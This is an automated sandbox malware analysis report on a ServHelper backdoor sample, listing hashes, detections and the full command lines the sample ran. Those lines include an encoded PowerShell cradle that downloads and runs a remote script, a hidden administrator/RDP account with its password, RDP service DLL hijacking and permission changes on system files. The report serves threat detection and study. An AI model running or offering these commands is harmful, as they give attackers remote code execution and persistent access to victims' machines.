Analysis
max time kernel: 138s
max time network: 159s
platform: windows7_x64
resource: win7v20210408
submitted: 11-08-2021 07:36

Static task: static1
Behavioral task: behavioral1
  Sample: bfe0ac25eeeb759f7c8e06229c7313a2.exe
  Resource: win7v20210408
Behavioral task: behavioral2
  Sample: bfe0ac25eeeb759f7c8e06229c7313a2.exe
  Resource: win10v20210410

General
Target: bfe0ac25eeeb759f7c8e06229c7313a2.exe
Size: 5.9MB
MD5: bfe0ac25eeeb759f7c8e06229c7313a2
SHA1: 199c1fbd29f9ec98b83464763dac63ef80998bb3
SHA256: be9c5e5ce6d4544e6bddbd47c26873fe0c33414086824b1d4968a638184a8a7c
SHA512: a0f3b477de1603d7e032608692857a4865059ba61ae1276334f281970a1484a6c81463fba2a2bbc9821c016e06e206d621fdb97e8743fc60e3515fba88997a72

Malware Config
Extracted: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
suricata: ET MALWARE ServHelper CnC Inital Checkin
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 1 IoCs
Processes:
flow  pid  process
13    364  powershell.exe
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
pid   process
1596  icacls.exe
1652  icacls.exe
304   icacls.exe
364   icacls.exe
1508  icacls.exe
1896  icacls.exe
1660  takeown.exe
1852  icacls.exe
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource                        yara_rule
\Windows\Branding\mediasrv.png  upx
\Windows\Branding\mediasvc.png  upx
Loads dropped DLL 2 IoCs
Processes:
pid   process
1660  1660
Modifies file permissions 1 TTPs 8 IoCs
Processes:
pid   process
1596  icacls.exe
1652  icacls.exe
304   icacls.exe
364   icacls.exe
1508  icacls.exe
1896  icacls.exe
1660  takeown.exe
1852  icacls.exe
Drops file in System32 directory 1 IoCs
Processes:
description   ioc                             process
File created  C:\Windows\system32\rfxvmt.dll  powershell.exe
Drops file in Windows directory 21 IoCs
Processes:
description                   ioc                                                                                                                                                        process
File created                  C:\Windows\branding\mediasvc.png                                                                                                                           powershell.exe
File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_908d39ce-24b6-422d-b13c-1cd620ffe39a  powershell.exe
File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_54f86504-967f-47ba-8a81-52faa6c5b4c3  powershell.exe
File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0496d9a4-e54c-4347-8002-3f181ea1c903  powershell.exe
File opened for modification  C:\Windows\branding\wupsvc.jpg                                                                                                                             powershell.exe
File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex                         powershell.exe
File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_35772917-17dd-4b06-85c2-c2e3d36dc898  powershell.exe
File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7715f61-688a-488b-a83c-db9fbbd70e7e  powershell.exe
File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_354611f8-ce69-447b-b662-a8186d10bbc3  powershell.exe
File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4b72bc87-8380-42cd-9d4d-547942f6041f  powershell.exe
File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_27cb5a9a-b333-4ada-9b75-556eab32d099  powershell.exe
File created                  C:\Windows\branding\wupsvc.jpg                                                                                                                             powershell.exe
File opened for modification  C:\Windows\branding\Basebrd                                                                                                                                powershell.exe
File opened for modification  C:\Windows\branding\mediasvc.png                                                                                                                           powershell.exe
File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e65ec103-2669-4c30-b9d2-f69cf8116b4b  powershell.exe
File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_de533a78-9572-45c8-842a-cdb660a1681e  powershell.exe
File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f99ea740-6a9c-4120-bf17-7f8d9541ca3c  powershell.exe
File created                  C:\Windows\branding\mediasrv.png                                                                                                                           powershell.exe
File opened for modification  C:\Windows\branding\ShellBrd                                                                                                                               powershell.exe
File opened for modification  C:\Windows\branding\mediasrv.png                                                                                                                           powershell.exe
File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\49YMOHYACZO61Z40T6ZG.temp                           powershell.exe
Modifies data under HKEY_USERS 4 IoCs
Processes:
description       ioc                                                                                                                 process
Set value (data)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = b0e7e004958ed701  powershell.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\                           WMIC.exe
Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\                           WMIC.exe
Key created       \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage                                   powershell.exe
Modifies registry key 1 TTPs 1 IoCs
-
Processes:
description       ioc                                                                                                                       process
Key created       \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13         bfe0ac25eeeb759f7c8e06229c7313a2.exe
Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = …  bfe0ac25eeeb759f7c8e06229c7313a2.exe
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
pid   process
1808  powershell.exe
1808  powershell.exe
880   powershell.exe
880   powershell.exe
1148  powershell.exe
1148  powershell.exe
1684  powershell.exe
1684  powershell.exe
1808  powershell.exe
1808  powershell.exe
1808  powershell.exe
364   powershell.exe
364   powershell.exe
Suspicious behavior: LoadsDriver 5 IoCs
Processes:
pid   process
468
1660
1660
1660
1660
Suspicious use of AdjustPrivilegeToken 19 IoCs
Processes:
description                           pid   process
Token: SeDebugPrivilege               2016  bfe0ac25eeeb759f7c8e06229c7313a2.exe
Token: SeDebugPrivilege               1808  powershell.exe
Token: SeDebugPrivilege               880   powershell.exe
Token: SeDebugPrivilege               1148  powershell.exe
Token: SeDebugPrivilege               1684  powershell.exe
Token: SeRestorePrivilege             1596  icacls.exe
Token: SeAssignPrimaryTokenPrivilege  1600  WMIC.exe
Token: SeIncreaseQuotaPrivilege       1600  WMIC.exe
Token: SeAuditPrivilege               1600  WMIC.exe
Token: SeAssignPrimaryTokenPrivilege  1600  WMIC.exe
Token: SeIncreaseQuotaPrivilege       1600  WMIC.exe
Token: SeAuditPrivilege               1600  WMIC.exe
Token: SeAssignPrimaryTokenPrivilege  636   WMIC.exe
Token: SeIncreaseQuotaPrivilege       636   WMIC.exe
Token: SeAuditPrivilege               636   WMIC.exe
Token: SeAssignPrimaryTokenPrivilege  636   WMIC.exe
Token: SeIncreaseQuotaPrivilege       636   WMIC.exe
Token: SeAuditPrivilege               636   WMIC.exe
Token: SeDebugPrivilege               364   powershell.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description                          pid   process                                target process   events
PID 2016 wrote to memory of 1808     2016  bfe0ac25eeeb759f7c8e06229c7313a2.exe  powershell.exe   3
PID 1808 wrote to memory of 616      1808  powershell.exe                        csc.exe          3
PID 616 wrote to memory of 824       616   csc.exe                               cvtres.exe       3
PID 1808 wrote to memory of 880      1808  powershell.exe                        powershell.exe   3
PID 1808 wrote to memory of 1148     1808  powershell.exe                        powershell.exe   3
PID 1808 wrote to memory of 1684     1808  powershell.exe                        powershell.exe   3
PID 1808 wrote to memory of 1660     1808  powershell.exe                        takeown.exe      3
PID 1808 wrote to memory of 1852     1808  powershell.exe                        icacls.exe       3
PID 1808 wrote to memory of 1596     1808  powershell.exe                        icacls.exe       3
PID 1808 wrote to memory of 1652     1808  powershell.exe                        icacls.exe       3
PID 1808 wrote to memory of 304      1808  powershell.exe                        icacls.exe       3
PID 1808 wrote to memory of 364      1808  powershell.exe                        icacls.exe       3
PID 1808 wrote to memory of 1508     1808  powershell.exe                        icacls.exe       3
PID 1808 wrote to memory of 1896     1808  powershell.exe                        icacls.exe       3
PID 1808 wrote to memory of 960      1808  powershell.exe                        reg.exe          3
PID 1808 wrote to memory of 956      1808  powershell.exe                        reg.exe          3
PID 1808 wrote to memory of 1252     1808  powershell.exe                        reg.exe          3
PID 1808 wrote to memory of 1348     1808  powershell.exe                        net.exe          3
PID 1348 wrote to memory of 1160     1348  net.exe                               net1.exe         3
PID 1808 wrote to memory of 572      1808  powershell.exe                        cmd.exe          3
PID 572 wrote to memory of 1788      572   cmd.exe                               cmd.exe          3
PID 1788 wrote to memory of 328      1788  cmd.exe                               net.exe          1
(the "events" column counts the identical rows the sandbox logged for each write; 64 rows in total)
Processes
(indentation shows the parent/child depth reported by the sandbox)

C:\Users\Admin\AppData\Local\Temp\bfe0ac25eeeb759f7c8e06229c7313a2.exe (PID 2016)
  command line: "C:\Users\Admin\AppData\Local\Temp\bfe0ac25eeeb759f7c8e06229c7313a2.exe"
  - Modifies system certificate store
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1808)
    command line: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
    - Drops file in System32 directory
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (PID 616)
      command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\i0kkpqrr\i0kkpqrr.cmdline"
      - Suspicious use of WriteProcessMemory
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (PID 824)
        command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3830.tmp" "c:\Users\Admin\AppData\Local\Temp\i0kkpqrr\CSC33BE8908D41844F1B7E2D153036817B.TMP"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 880)
      command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1148)
      command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1684)
      command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\takeown.exe (PID 1660)
      command line: "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
      - Possible privilege escalation attempt
      - Modifies file permissions
    C:\Windows\system32\icacls.exe (PID 1852)
      command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
      - Possible privilege escalation attempt
      - Modifies file permissions
    C:\Windows\system32\icacls.exe (PID 1596)
      command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\icacls.exe (PID 1652)
      command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
      - Possible privilege escalation attempt
      - Modifies file permissions
    C:\Windows\system32\icacls.exe (PID 304)
      command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
      - Possible privilege escalation attempt
      - Modifies file permissions
    C:\Windows\system32\icacls.exe (PID 364)
      command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
      - Possible privilege escalation attempt
      - Modifies file permissions
    C:\Windows\system32\icacls.exe (PID 1508)
      command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
      - Possible privilege escalation attempt
      - Modifies file permissions
    C:\Windows\system32\icacls.exe (PID 1896)
      command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
      - Possible privilege escalation attempt
      - Modifies file permissions
    C:\Windows\system32\reg.exe (PID 960)
      command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    C:\Windows\system32\reg.exe (PID 956)
      command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
      - Modifies registry key
    C:\Windows\system32\reg.exe (PID 1252)
      command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    C:\Windows\system32\net.exe (PID 1348)
      command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\net1.exe (PID 1160)
        command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    C:\Windows\system32\cmd.exe (PID 572)
      command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\cmd.exe (PID 1788)
        command line: cmd /c net start rdpdr
        - Suspicious use of WriteProcessMemory
        C:\Windows\system32\net.exe (PID 328)
          command line: net start rdpdr
          C:\Windows\system32\net1.exe (PID 1820)
            command line: C:\Windows\system32\net1 start rdpdr
    C:\Windows\system32\cmd.exe (PID 824)
      command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      C:\Windows\system32\cmd.exe (PID 1148)
        command line: cmd /c net start TermService
        C:\Windows\system32\net.exe (PID 556)
          command line: net start TermService
          C:\Windows\system32\net1.exe (PID 952)
            command line: C:\Windows\system32\net1 start TermService
    C:\Windows\system32\cmd.exe (PID 1148)
      command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    C:\Windows\system32\cmd.exe (PID 824)
      command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

C:\Windows\System32\cmd.exe (PID 1316)
  command line: cmd /C net.exe user WgaUtilAcc 000000 /del
  C:\Windows\system32\net.exe (PID 1692)
    command line: net.exe user WgaUtilAcc 000000 /del
    C:\Windows\system32\net1.exe (PID 932)
      command line: C:\Windows\system32\net1 user WgaUtilAcc 000000 /del

C:\Windows\System32\cmd.exe (PID 2008)
  command line: cmd /C net.exe user WgaUtilAcc Ooom35gS /add
  C:\Windows\system32\net.exe (PID 880)
    command line: net.exe user WgaUtilAcc Ooom35gS /add
    C:\Windows\system32\net1.exe (PID 1828)
      command line: C:\Windows\system32\net1 user WgaUtilAcc Ooom35gS /add

C:\Windows\System32\cmd.exe (PID 1104)
  command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  C:\Windows\system32\net.exe (PID 772)
    command line: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    C:\Windows\system32\net1.exe (PID 328)
      command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe (PID 1904)
  command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD
  C:\Windows\system32\net.exe (PID 304)
    command line: net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD
    C:\Windows\system32\net1.exe (PID 1656)
      command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD

C:\Windows\System32\cmd.exe (PID 636)
  command line: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  C:\Windows\system32\net.exe (PID 1536)
    command line: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
    C:\Windows\system32\net1.exe (PID 1364)
      command line: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe (PID 1644)
  command line: cmd /C net.exe user WgaUtilAcc Ooom35gS
  C:\Windows\system32\net.exe (PID 1668)
    command line: net.exe user WgaUtilAcc Ooom35gS
    C:\Windows\system32\net1.exe (PID 1736)
      command line: C:\Windows\system32\net1 user WgaUtilAcc Ooom35gS

C:\Windows\System32\cmd.exe (PID 2024)
  command line: cmd.exe /C wmic path win32_VideoController get name
  C:\Windows\System32\Wbem\WMIC.exe (PID 1600)
    command line: wmic path win32_VideoController get name
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken

C:\Windows\System32\cmd.exe (PID 1560)
  command line: cmd.exe /C wmic CPU get NAME
  C:\Windows\System32\Wbem\WMIC.exe (PID 636)
    command line: wmic CPU get NAME
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken

C:\Windows\System32\cmd.exe (PID 1840)
  command line: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  C:\Windows\system32\cmd.exe (PID 1644)
    command line: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 364)
      command line: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
      - Blocklisted process makes network request
      - Drops file in Windows directory
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

The -enc argument in the three command lines above is base64 over UTF-16LE text; it decodes to IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1"), the same URL listed under Malware Config.
Network
MITRE ATT&CK Enterprise v6
Downloads